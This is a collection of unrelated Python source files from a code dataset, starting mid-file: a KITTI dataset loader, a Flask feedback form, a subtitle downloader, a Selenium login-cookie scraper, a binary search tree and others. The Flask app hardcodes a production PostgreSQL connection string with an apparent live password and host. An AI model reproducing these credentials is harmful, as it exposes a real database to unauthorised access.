\"{:06d}.bin\".format(frameid)\n filename = os.path.join(self.lidar_path, basename)\n lidar = np.fromfile(filename, dtype=np.float32).reshape(-1, 4)\n return lidar\n\n def _get_calib(self, frameid):\n basename = \"{:06d}.txt\".format(frameid)\n filename = os.path.join(self.calib_path, basename)\n calib = 
self.read_calib(filename)\n return calib\n\n def _get_label(self, frameid):\n basename = \"{:06d}.txt\".format(frameid)\n filename = os.path.join(self.label_path, basename)\n annotations = self.read_label_annotations(filename, self.remove_dontcare)\n annotations = self.add_difficulty_to_annotations(annotations)\n return annotations\n\n @staticmethod\n def rectify_lidar(lidar, calib):\n n = lidar.shape[0]\n velo_to_rect = np.dot(calib[\"velo_to_cam\"].T, calib[\"R0\"].T)\n xyzw = np.c_[lidar[:, 0:3], np.ones(n)]\n xyz = np.dot(xyzw, velo_to_rect)\n intensity = lidar[:, 3]\n return np.c_[xyz, intensity]\n\n @staticmethod\n def add_difficulty_to_annotations(annotations):\n min_height = [40, 25, 25]\n max_occlusion = [0, 1, 2]\n max_truncation = [0.15, 0.3, 0.5]\n bbox = annotations[\"bbox\"]\n height = bbox[:, 3] - bbox[:, 1]\n occlusion = annotations[\"occluded\"]\n truncation = annotations[\"truncated\"]\n\n num_annotations = len(annotations[\"class\"])\n is_easy = np.ones((num_annotations,), dtype=np.bool)\n is_moderate = np.ones((num_annotations,), dtype=np.bool)\n is_hard = np.ones((num_annotations,), dtype=np.bool)\n for i, (h, o, t) in enumerate(zip(height, occlusion, truncation)):\n if o > max_occlusion[0] or h <= min_height[0] or t > max_truncation[0]:\n is_easy[i] = False\n if o > max_occlusion[1] or h <= min_height[1] or t > max_truncation[1]:\n is_moderate[i] = False\n if o > max_occlusion[2] or h <= min_height[2] or t > max_truncation[2]:\n is_hard[i] = False\n is_hard = np.logical_xor(is_hard, is_moderate)\n is_moderate = np.logical_xor(is_moderate, is_easy)\n\n difficulty = []\n for i in range(num_annotations):\n if is_easy[i]:\n difficulty.append(0)\n elif is_moderate[i]:\n difficulty.append(1)\n elif is_hard[i]:\n difficulty.append(2)\n else:\n difficulty.append(-1)\n annotations[\"difficulty\"] = np.array(difficulty, dtype=np.int32)\n return annotations\n\n @staticmethod\n def read_label_annotations(filename, remove_dontcare=True):\n annotations = {\n \"class\": [],\n \"truncated\": [],\n \"occluded\": [],\n \"alpha\": [],\n \"bbox\": [],\n \"size\": [],\n \"center\": [],\n \"yaw\": [],\n }\n with open(filename, \"r\") as fp:\n lines = [line.strip().split(\" \") for line in fp.readlines()]\n if remove_dontcare:\n lines = [line for line in lines if line[0] != \"DontCare\"]\n annotations[\"class\"] = np.array([x[0] for x in lines])\n annotations[\"truncated\"] = np.array([float(x[1]) for x in lines])\n annotations[\"occluded\"] = np.array([int(x[2]) for x in lines])\n annotations[\"alpha\"] = np.array([float(x[3]) for x in lines])\n annotations[\"bbox\"] = np.array([[float(v) for v in x[4:8]] for x in lines])\n annotations[\"size\"] = np.array([[float(v) for v in x[8:11]] for x in lines])\n annotations[\"center\"] = np.array([[float(v) for v in x[11:14]] for x in lines])\n annotations[\"yaw\"] = np.array([float(x[14]) for x in lines])\n annotations[\"bbox\"] = annotations[\"bbox\"].reshape(-1, 4)\n annotations[\"size\"] = annotations[\"size\"].reshape(-1, 3)\n annotations[\"center\"] = annotations[\"center\"].reshape(-1, 3)\n annotations[\"yaw\"] = annotations[\"yaw\"].reshape(-1)\n return annotations\n\n @staticmethod\n def read_calib(filename):\n calib = {}\n with open(filename, \"r\") as fp:\n lines = [line.strip().split(\" \") for line in fp.readlines()]\n calib[\"P0\"] = np.array([float(x) for x in lines[0][1:13]])\n calib[\"P1\"] = np.array([float(x) for x in lines[1][1:13]])\n calib[\"P2\"] = np.array([float(x) for x in lines[2][1:13]])\n calib[\"P3\"] = 
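read_label_annotations above slices each KITTI label line into fifteen whitespace-separated fields (x[0] through x[14]). For reference, this is the standard KITTI layout those slices assume, checked against an illustrative line (the numbers are made up but shaped like real labels):

# 0     class      e.g. Car, Pedestrian, Cyclist, DontCare
# 1     truncated  float in [0, 1]
# 2     occluded   int, 0 (fully visible) .. 3 (unknown)
# 3     alpha      observation angle in [-pi, pi]
# 4-7   bbox       2D box: left, top, right, bottom (pixels)
# 8-10  size       3D dimensions: height, width, length (metres)
# 11-13 center     3D location x, y, z in camera coordinates (metres)
# 14    yaw        rotation around the camera Y axis in [-pi, pi]
sample = "Car 0.00 0 -1.58 587.01 173.33 614.12 200.12 1.65 1.67 3.64 -0.65 1.71 46.70 -1.59"
fields = sample.split(" ")
assert len(fields) == 15
print(fields[0], [float(v) for v in fields[4:8]])   # class name plus 2D bbox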
np.array([float(x) for x in lines[3][1:13]])\n calib[\"R0\"] = np.array([float(x) for x in lines[4][1:10]])\n calib[\"velo_to_cam\"] = np.array([float(x) for x in lines[5][1:13]])\n calib[\"imu_to_velo\"] = np.array([float(x) for x in lines[6][1:13]])\n calib[\"P0\"] = calib[\"P0\"].reshape(3, 4)\n calib[\"P1\"] = calib[\"P1\"].reshape(3, 4)\n calib[\"P2\"] = calib[\"P2\"].reshape(3, 4)\n calib[\"P3\"] = calib[\"P3\"].reshape(3, 4)\n calib[\"R0\"] = calib[\"R0\"].reshape(3, 3)\n calib[\"velo_to_cam\"] = calib[\"velo_to_cam\"].reshape(3, 4)\n calib[\"imu_to_velo\"] = calib[\"imu_to_velo\"].reshape(3, 4)\n return calib\n\n @staticmethod\n def collate_fn(batch):\n return [list(x) for x in zip(*batch)]\n","sub_path":"torch3d/datasets/kitti.py","file_name":"kitti.py","file_ext":"py","file_size_in_byte":8305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351106390","text":"from helper_functions import *\nfrom settings import *\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef main():\n loss_path = getLossPath(MODEL_NAME)\n loss = pickle.load(open(loss_path, \"rb\"))\n\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.plot(loss['training']['loss'])\n plt.title('Training loss')\n\n plt.subplot(2, 2, 2)\n plt.plot(loss['training']['accuracy'])\n plt.title('Training accuracy')\n\n plt.subplot(2, 2, 3)\n plt.plot(loss['validation']['loss'])\n plt.title('Validation loss')\n\n plt.subplot(2, 2, 4)\n plt.plot(loss['validation']['accuracy'])\n plt.title('Validation accuracy')\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"inspect_loss.py","file_name":"inspect_loss.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483900864","text":"from flask import Flask, render_template, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom send_mail import send_mail\r\n\r\napp = Flask(__name__)\r\n\r\nENV = 'prod'\r\n\r\nif ENV == 'dev':\r\n app.debug = True\r\n app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:Srqq98aa@localhost/debinco'\r\nelse:\r\n app.debug = False\r\n app.config[\r\n 'SQLALCHEMY_DATABASE_URI'] = 'postgresql://ohtejgtdgvlmwd:15013d2fb0ec2513023518d5b87e495eebe6bb8ced597980e789892849129e3f@ec2-3-223-72-172.compute-1.amazonaws.com:5432/davopa4qfajuas'\r\n\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\ndb = SQLAlchemy(app)\r\n\r\n#\r\n# class Feedback(db.Model):\r\n# __tablename__ = 'feedback'\r\n# id = db.Column(db.Integer, primary_key=True)\r\n# Name = db.Column(db.String(200), unique=True)\r\n# Phone_Number = db.Column(db.String(20))\r\n# Email = db.Column(db.String(200))\r\n# rating = db.Column(db.Integer)\r\n# comments = db.Column(db.Text())\r\n#\r\n# def __init__(self, Name, Phone_Number , Email, rating, comments):\r\n# self.Name = Name\r\n# self.Phone_Number = Phone_Number\r\n# self.Email = Email\r\n# self.rating = rating\r\n# self.comments = comments\r\n#\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n if request.method == 'POST':\r\n Name = request.form['Name']\r\n Phone_Number = request.form['Phone_Number']\r\n Email = request.form['Email']\r\n rating = request.form['rating']\r\n comments = request.form['comments']\r\n # print(customer,dealer,rating,comments)\r\n # print(customer,dealer,rating,comments)\r\n if Name == '' or Phone_Number == '':\r\n return 
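rectify_lidar in the KITTI loader above computes the devkit chain x_rect = R0 · Tr_velo_to_cam · x for every point in one batched product, by right-multiplying homogeneous rows with the transposed matrices. A small numpy check with made-up calibration values, showing the batched form and the per-point form agree:

import numpy as np

# Made-up calibration: any 3x3 R0 and 3x4 Tr_velo_to_cam work for this check.
R0 = np.eye(3)
Tr = np.hstack([np.eye(3), np.array([[0.27], [0.0], [-0.08]])])   # 3x4

points = np.array([[10.0, 1.0, -1.5]])        # one LiDAR point, shape (N, 3)
xyzw = np.c_[points, np.ones(len(points))]    # homogeneous rows, shape (N, 4)

batched = xyzw @ (Tr.T @ R0.T)                # the form used in the dataset class
per_point = R0 @ (Tr @ xyzw[0])               # the per-point devkit form

assert np.allclose(batched[0], per_point)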
render_template('index.html', message=\"Please enter required feilds\")\r\n else:\r\n send_mail(Name, Phone_Number, Email, rating, comments)\r\n return render_template('success.html')\r\n\r\n return render_template('index.html', message=\"You have already Submitted\")\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227666027","text":"# -*- coding: utf-8 -*-\r\nfrom Database.oracle import Oracle\r\nfrom config_file import config_na1 as na1\r\nimport config_file as cf\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\nimport datetime\r\nimport numpy as np\r\nimport cPickle\r\nfrom Analysis.fitting import fit_1D_data, filter_relevant, funcs\r\n\r\n\r\nfrom Tools.helper import init_logging\r\nimport logging\r\n\r\n\r\n\r\nORACLE = Oracle(db_user=na1[\"user\"], db_pwd=na1[\"password\"], db_srv=na1[\"SID\"], db_ip=na1[\"ip\"], db_port=na1[\"port\"])\r\n\r\n\r\nif __name__ == '__main__':\r\n dialay = diagram_layout()\r\n dialay.set_defaults(defaultset=\"powerpoint\")\r\n\r\n\r\n sql = \"\"\"select cm, von, bis, asb from oa_cm_cmts_asb_hist_cons order by asb\r\n \"\"\"\r\n\r\n# data = ORACLE.executeSQL(sql)\r\n\r\n sql = \"\"\" select distinct asb from oa_cm_cmts_asb_hist order by asb\"\"\"\r\n# asbs = ORACLE.executeSQL(sql)\r\n\r\n #f = open('netzalter_raw.dat', 'wb')\r\n #cPickle.dump((data, asbs), f)\r\n\r\n #===========================================================================\r\n # f = open('netzalter_raw.dat', 'rb')\r\n # data, asbs = cPickle.load(f)\r\n # print(len(data))\r\n # print(len(asbs))\r\n #===========================================================================\r\n\r\n# asbdata = []\r\n# ind = 0\r\n# maxi = -1\r\n# for asb in asbs:\r\n# sd = datetime.datetime(2009, 2, 4, 0, 0)\r\n# ox = []\r\n# oy = []\r\n# ind = maxi + 1\r\n# while sd < datetime.datetime(2014, 4, 26, 0, 0):\r\n# dummy = 0\r\n# i = ind\r\n# while i < len(data) and data[i][3] == asb:\r\n# if i > maxi:\r\n# maxi = i\r\n# if data[i][3] == asb and data[i][1] <= sd and (data[i][2] == None or data[i][2] > sd):\r\n# dummy += 1\r\n# i += 1\r\n# ox += [sd]\r\n# oy += [dummy]\r\n# sd += datetime.timedelta(7)\r\n# asbdata += [[asb, ox, oy]]\r\n #print(asbdata[len(asbdata) - 1])\r\n\r\n# f = open('C:\\Plots\\\\netzalter.dat', 'wb')\r\n# cPickle.dump(asbdata, f)\r\n\r\n f = open('C:\\Plots\\\\netzalter.dat', 'rb')\r\n asbdata = cPickle.load(f)\r\n\r\n oy = []\r\n ox = []\r\n seglist = []\r\n for asb in asbdata:\r\n segdates = []\r\n for i in range(1,len(asb[2])-2):\r\n if asb[2][i] > 0 and asb[2][i+1] / float(asb[2][i]) < 0.7 and (asb[2][i] - asb[2][i+1] > 20) and asb[1][i-1] not in segdates and asb[2][i+1] > asb[2][i]/10.0 and asb[2][i+2] / float(asb[2][i]) < 0.7:\r\n #segdates += [asb[1][i]]\r\n seglist += [[asb[0], asb[1][i]]]\r\n #if segdates:\r\n # seglist += [[asb[0], segdates]]\r\n\r\n columns = [\"ASB\", \"Seg_date\"]\r\n col_types = [u\"abcdefg\",datetime.date(2013,12,12)]\r\n tablename = \"asb_segdate\"\r\n\r\n #ORACLE.drop_table(tablename)\r\n #ORACLE.create_table(tablename, columns, col_types)\r\n #ORACLE.insert_data(table=tablename, columns=columns, data=seglist, stepWidth=10000)\r\n\r\n for j in range(len(asbdata[0][1])):\r\n ox += [asbdata[0][1][j]]\r\n dummy = 0\r\n for i in range(len(asbdata)):\r\n if 'ASB Falkensee Hk A RW 3 UPK 02' in asbdata[i][0]:\r\n dummy += 
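One footnote on the Twitter follower script above: sorted(..., key=operator.itemgetter(1)) orders the pairs ascending, so the most-followed account lands at the end of sorted_list. If a leaderboard is the goal, the usual variant (with illustrative counts) is:

import operator

user_follower_dictionary = {"alice": 120, "bob": 45, "carol": 900}   # illustrative
leaderboard = sorted(user_follower_dictionary.items(),
                     key=operator.itemgetter(1), reverse=True)
print(leaderboard)   # [('carol', 900), ('alice', 120), ('bob', 45)]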
asbdata[i][2][j]\r\n oy += [dummy]\r\n\r\n dialay.add_lineplot(x=ox, y=oy, title='Modems laut oa_cm_cmts_asb_hist', y_label='Modems')\r\n\r\n#===============================================================================\r\n# meanormy = [0 for i in range(len(ox))]\r\n# asbcount = [0 for i in range(len(ox))]\r\n# for i in range(len(asbdata)):\r\n# maxi = max(asbdata[i][2])\r\n# temparr = []\r\n# k = 0\r\n# for j in range(len(asbdata[i][2])):\r\n# \r\n# if asbdata[i][2][j] > 0:\r\n# temparr += [asbdata[i][2][j] / float(maxi)]\r\n# meanormy[k] += asbdata[i][2][j] / float(maxi)\r\n# asbcount[k] += 1\r\n# k += 1\r\n# \r\n# asbdata[i][2] = temparr\r\n# \r\n# for i in range(len(asbcount)):\r\n# if asbcount[i] == 0:\r\n# asbcount[i] = 1\r\n# \r\n# meanormy = [meanormy[i] / float(asbcount[i]) for i in range(len(asbcount))]\r\n# \r\n# dialay.add_lineplot(x=[i for i in range(len(asbdata[0][1]))], y=asbdata[111][2])\r\n#===============================================================================\r\n\r\n dialay.show()\r\n","sub_path":"naos-python/Source/SH/Bandbreite/netz_aging.py","file_name":"netz_aging.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215116825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 3 10:06:33 2018\n\n@author: jasneet\n\"\"\"\n\n# Importing the libraries\nimport pandas as pd\nimport tweepy\nimport operator\n\n\n# Get data from csv file\ndataset = pd.read_csv('vnps.csv')\ntwitter_users = dataset.iloc[:,1].values\n\n#Load the tweepy api and do aunthentication\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_secret = ''\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth)\n\nuser_follower_dictionary = {}\nfor user in twitter_users[:]:\n print(user)\n try:\n tweepy_user_object = api.get_user(id=user)\n user_follower_dictionary[user] = tweepy_user_object.followers_count\n except tweepy.TweepError:\n user_follower_dictionary[user] = 0\n\nsorted_list = sorted(user_follower_dictionary.items(), key=operator.itemgetter(1))","sub_path":"Competition/Uottawa/uottawa_twitter_challenge.py","file_name":"uottawa_twitter_challenge.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183897147","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 7 18:02:22 2019\n\n@author: Rawat\n\"\"\"\n\nclass node:\n def __init__(self,data):\n self.data=data\n self.left=None\n self.right=None\n self.p=None\nclass tree:\n root=None\n def insert(self,data):\n z=node(data)\n y=None\n x=self.root\n while x!=None:\n y=x\n if x.data>z.data:\n x=x.left\n else:\n x=x.right\n z.p=y\n if y==None:\n self.root=z\n elif y.data>z.data:\n y.left=z\n else:\n y.right=z\n def inorder(self):\n self.inorderec(self.root)\n def inorderec(self,start):\n if start!=None:\n self.inorderec(start.left)\n print(start.data)\n self.inorderec(start.right)\n def Succesor(self,x):\n if x.right!=None:\n u=x.right\n while u.left!=None:\n u=u.left\n return u.data\n else:\n u=x.p\n while u!=None and u.right==x:\n x=u\n u=u.p\n if u!=None:\n return u.data\n else:\n return None\n def TreeMaximum(self,x):\n while x.right!=None:\n x=x.right\n return x\n def TreeMinimum(self,x):\n while x.left!=None:\n x=x.left\n def TreeSearch(self,key):\n x=self.root\n while x!=None:\n if x.data==key:\n return x\n elif 
x.data>key:\n x=x.left\n else:\n x=x.right\n def Transplant(self,x,y):\n if x==None:\n self.root=y\n elif x==x.p.right:\n x.p.right=y\n else:\n x.p.left=y\n if y!=None:\n y.p=x.p\n def delete(self,z):\n if z.left==None:\n self.Transplant(z,z.right)\n elif z.right==None:\n self.Transplant(z,z.left)\n else:\n y=self.TreeMinimum(z.right)\n if y.p!=z:\n self.Transplant(y,y.right)\n y.right=z.right\n z.right.p=y\n self.Transplant(z,y)\n z.left.p=y\n y.left=z.left\n \n \n \nif __name__==\"__main__\":\n t=tree()\n print(\"enter the tree data\")\n x=map(int,input().rstrip().split())\n for i in x:\n t.insert(i)\n print(\"display tree inorder\")\n t.inorder()\n print(\"enter the element to be deleted\")\n x=map(int,input().rstrip().split())\n for i in x:\n u=t.TreeSearch(i)\n t.delete(u)\n print(\"after the deletion operation of %d \"%u.data)\n t.inorder()\n","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355682058","text":"import glob\nimport os\nimport gzip\nimport binascii\nimport io\nimport re\nimport collections\n\nimport open_subtitles\n\nfrom xmlrpc.client import ServerProxy\n\n\ndef filter_subtitles(subtitles, search):\n season = int(search.group('season'))\n episode = int(search.group('episode'))\n subtitles = [d for d in subtitles if (d['SeriesEpisode'] == str(episode) and d['SeriesSeason'] == str(season))]\n return subtitles\n\n\ndef get_video_files():\n current_dir = os.getcwd()\n # TODO: Handle all supported file types\n videos = glob.glob(os.path.join(current_dir, '*.mkv'))\n return videos\n\n\ndef get_login_token(server):\n login_info = server.LogIn('', '', 'en', 'OSTestUserAgentTemp')\n token = login_info['token']\n return token\n\n\ndef get_file_info(video_file):\n filename = (os.path.basename(video_file))\n filename = os.path.splitext(filename)[0]\n file_size = os.path.getsize(video_file)\n file_hash = open_subtitles.hash_file(video_file)\n\n File = collections.namedtuple('File', 'name, size, hash')\n file_info = File(filename, file_size, file_hash)\n return file_info\n\n\ndef download_subtitles(subtitles_found, server, token, file_info):\n sub = max(subtitles_found, key=lambda x: x.get('score', 0))\n\n sub_id = sub['IDSubtitleFile']\n\n sub_file = server.DownloadSubtitles(token, [sub_id])\n\n coded_string = sub_file['data'][0]['data']\n\n subtitles = gzip.decompress(binascii.a2b_base64(coded_string))\n\n sub_filename = file_info.name + '.srt'\n\n with io.FileIO(sub_filename, \"w\") as file:\n file.write(subtitles)\n\n\ndef main():\n print('Searching video files.')\n videos = get_video_files()\n if not videos:\n print(' - No video files found. \\n Done.')\n return\n\n server_name = 'http://api.opensubtitles.org/xml-rpc'\n server = ServerProxy(server_name)\n token = get_login_token(server)\n\n print(' - {} video files found.'.format(len(videos)))\n\n for video_file in videos:\n file_info = get_file_info(video_file)\n\n print('Searching subtitles for {}.'.format(file_info.name))\n\n params = {'moviehash': file_info.hash, 'moviebytesize': file_info.size, 'sublanguageid': 'eng'}\n\n subs = server.SearchSubtitles(token, [params])\n if subs['status'] != '200 OK':\n print('Error {0}'.format(subs['status']))\n continue\n\n subtitles_found = subs['data']\n\n regex = re.compile(r\"\"\"[Ss](?P\\d+) # season number (i.e. S01 or s2)\n [Ee](?P\\d+) # episode number (i.e. 
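A correctness note on the binary search tree record above: TreeMinimum walks to the leftmost node but never returns it, so deleting a node with two children makes y = self.TreeMinimum(z.right) come back as None, and delete then crashes at y.p. The fix is a single return, shown standalone against the same node shape:

def tree_minimum(x):
    # Descend left links; the leftmost node holds the smallest key.
    while x.left is not None:
        x = x.left
    return x   # the return missing from the original TreeMinimum

With that in place, the two-child branch of delete behaves as in CLRS: the in-order successor is spliced out of the right subtree with Transplant and moved into the deleted node's position.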
E1 or e02)\n \"\"\", re.X)\n search = re.search(regex, file_info.name)\n if search:\n subtitles_found = filter_subtitles(subtitles_found, search)\n\n if not subtitles_found:\n print(' - No matching subtitles found.')\n continue\n\n print(' - Subtitles found. \\n - Downloading.')\n\n download_subtitles(subtitles_found, server, token, file_info)\n server.LogOut(token)\n\n print('Done.')\n\n# TODO exceptions, logs\n\n# TODO tests: file_info, subs search, filtering/validation, saving file\n\nif __name__ == '__main__':\n main()\n","sub_path":"subs.py","file_name":"subs.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217593766","text":"import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.chrome.options import Options\n\nchrome_options = Options()\nchrome_options.add_argument(\"--window-size=300,400\")\n\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.get(\"https://myportal.fhda.edu/cp/home/displaylogin\")\n\n\ndef scrape_cookies():\n driver.execute_script(f\"document.getElementById('user').value='{os.environ['MP_USER']}'\")\n driver.execute_script(f\"document.getElementById('pass').value='{os.environ['MP_PASS']}'\")\n\n try:\n driver.execute_script(\"doLogin()\")\n WebDriverWait(driver, 3).until(\n EC.title_is(\"MyPortal / Foothill-De Anza College District\")\n )\n\n driver.get(\n \"https://myportal.fhda.edu/render.UserLayoutRootNode.uP?uP_tparam=utf&utf=%2fcp%2fip%2flogin%3fsys%3dsctssb%26url%3dhttps%3A%2F%2Fbanssb.fhda.edu%2FPROD%2Fbwskfcls.p_sel_crse_search\")\n\n WebDriverWait(driver, 3).until(\n EC.title_is(\"MyPortal / Foothill-De Anza College District\")\n )\n finally:\n cookies_list = driver.get_cookies()\n\n return get_cookies(cookies_list)\n\n\ndef get_cookies(cookies_list):\n cookies_dict = {}\n for cookie in cookies_list:\n cookies_dict[cookie['name']] = cookie['value']\n return cookies_dict\n\n\ndef kill_driver():\n driver.quit()\n\n\nif __name__ == '__main__':\n scrape_cookies()\n","sub_path":"selenium_login.py","file_name":"selenium_login.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392474006","text":"#Checks last G0/G1 command that effects extruder. 
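The selenium_login.py record above hands back MyPortal cookies as a plain name-to-value dict. A hedged sketch of the usual next step, replaying them through a requests session against the Banner URL already hard-coded in the script; requests is an assumed extra dependency, and MP_USER/MP_PASS must be set in the environment as the module expects:

import requests

from selenium_login import scrape_cookies, kill_driver   # importing launches Chrome

cookies = scrape_cookies()
kill_driver()                      # the browser is only needed to harvest cookies

session = requests.Session()
session.cookies.update(cookies)
response = session.get("https://banssb.fhda.edu/PROD/bwskfcls.p_sel_crse_search")
print(response.status_code)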
outputs expected filament use in cm\r\n\r\nimport sys\r\n\r\nl_total = 0.0\r\n\r\ndef filenameFromPath(path):\r\n\tif (path[0] == '\\\"' or path[0] == '\\''):\r\n\t\tpath = path[1:-1]\r\n\tf_name = path[::-1]\r\n\tidx = f_name.index(\"\\\\\")\r\n\tf_name = f_name[:idx]\r\n\tf_name = f_name[::-1]\r\n\tprint(f_name)\r\n\r\ndef findLength(path):\r\n\twith open(path) as file:\r\n\t\tval = 0.0\r\n\t\tlength = 0.0\r\n\t\tm107Occ = False\r\n\t\tfor line in file:\r\n\t\t\tline = line.strip()\r\n\t\t\tif \"G0\" in line or \"G1\" in line:\r\n\t\t\t\tif \"E\" in line:\r\n\t\t\t\t\tidx = line.index('E')\r\n\t\t\t\t\tsubstr = line[idx+1:]\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttmp = float(substr)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\r\n\t\t\t\t\tif tmp > val:\r\n\t\t\t\t\t\tval = tmp\r\n\t\t\tif \"G92 E0\" in line:\r\n\t\t\t\tlength += val\r\n\t\t\tif \"M107\" in line:\r\n\t\t\t\tif m107Occ == True:\r\n\t\t\t\t\tlength +=val\r\n\t\t\t\t\tbreak\r\n\t\t\t\tm107Occ = True\r\n\t\t\t\t\r\n\t\t\r\n\t\tlength_raw = length\r\n\t\tlength = length/10\r\n\t\tlength = round(length, 3)\r\n\treturn(\"Filament length: {}cm\".format(length), length_raw)\r\n\r\nif __name__ == \"__main__\":\r\n\tif len(sys.argv) < 2:\r\n\t\tpath = input(\"File path: \")\r\n\t\tfilenameFromPath(path)\r\n\t\tout, length = findLength(path)\r\n\t\tprint(out)\r\n\telse:\r\n\t\tfor i in range(1, len(sys.argv)):\r\n\t\t\tpath = sys.argv[i]\r\n\t\t\tfilenameFromPath(path)\r\n\t\t\tout, length = findLength(path)\r\n\t\t\tl_total += length\r\n\t\t\tprint(out)\r\n\t\t\tprint()\t\r\n\t\ttotal = round((l_total/10),3)\r\n\t\tprint(\"Total: {}cm\".format(total))\r\n\tinput()\r\n","sub_path":"length.py","file_name":"length.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492714527","text":"# Pickle data from data folder\r\nimport _pickle as cPickle\r\nimport gzip\r\n\r\ndef load_data_wrapper(PATH_TRAIN):\r\n f1=gzip.open(PATH_TRAIN,'rb')\r\n training_data, validation_data, test_data, data_mean, data_std, label_mean, label_std=cPickle.load(f1, encoding='latin1')\r\n f1.close()\r\n return (training_data, validation_data, test_data, data_mean, data_std, label_mean, label_std)\r\n\r\ndef load_new_data(PATH_NEW):\r\n f2=gzip.open(PATH_NEW,'rb')\r\n datas, labels, x_new=cPickle.load(f2, encoding='latin1')\r\n f2.close()\r\n return (datas, labels, x_new)","sub_path":"ada-lr-df/ex6/ex6_loader.py","file_name":"ex6_loader.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393449154","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('trabajadores', '0001_initial'),\n ('mascotas', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Hospedaje',\n fields=[\n ('fecha_ini', models.DateField(null=True, blank=True)),\n ('fecha_fin', models.DateField(null=True, blank=True)),\n ('id_hosp', models.AutoField(serialize=False, primary_key=True)),\n ('nro_jaula', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Servicio',\n fields=[\n ('id_serv', models.IntegerField(serialize=False, primary_key=True)),\n ('fecha', models.DateTimeField(null=True, blank=True)),\n ('id_masc', models.ForeignKey(to='mascotas.Mascota')),\n ],\n options={\n },\n 
bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TipoServ',\n fields=[\n ('id_t_serv', models.AutoField(serialize=False, primary_key=True)),\n ('nomb_servicio', models.CharField(max_length=25)),\n ('precio_serv', models.DecimalField(max_digits=5, decimal_places=2)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='servicio',\n name='id_t_serv',\n field=models.ForeignKey(to='servicios.TipoServ'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='servicio',\n name='id_trab',\n field=models.ForeignKey(blank=True, to='trabajadores.Trabajador', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='hospedaje',\n name='id_serv',\n field=models.ForeignKey(to='servicios.Servicio'),\n preserve_default=True,\n ),\n ]\n","sub_path":"servicios/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"298136810","text":"import logging\n\nlogger = logging.getLogger(\"ImageClassifier\")\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(module)s - %(funcName)s - %(lineno)d - %(message)s\"\n)\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\nlogger.propagate = 0\n","sub_path":"src/utils/model_logger.py","file_name":"model_logger.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"87997783","text":"# The process of converting an object from python supported form to either file supported\n# form or network supported form, is called serialization (Marshalling or pickling)..\n\n# The process of converting an object from either file supported form or network supported\n# form to python supported form is called deserialization (Unmarshalling or unpickling)...\n\n# Object Serialization by using Pickle\n# Object Serialization by using JSON\n# Object Serialization by using YAML\n\n\n# Object Serialization by using Pickle:\n# We can perform serialization and deserialization of an object wrt file by using pickle\n# module. 
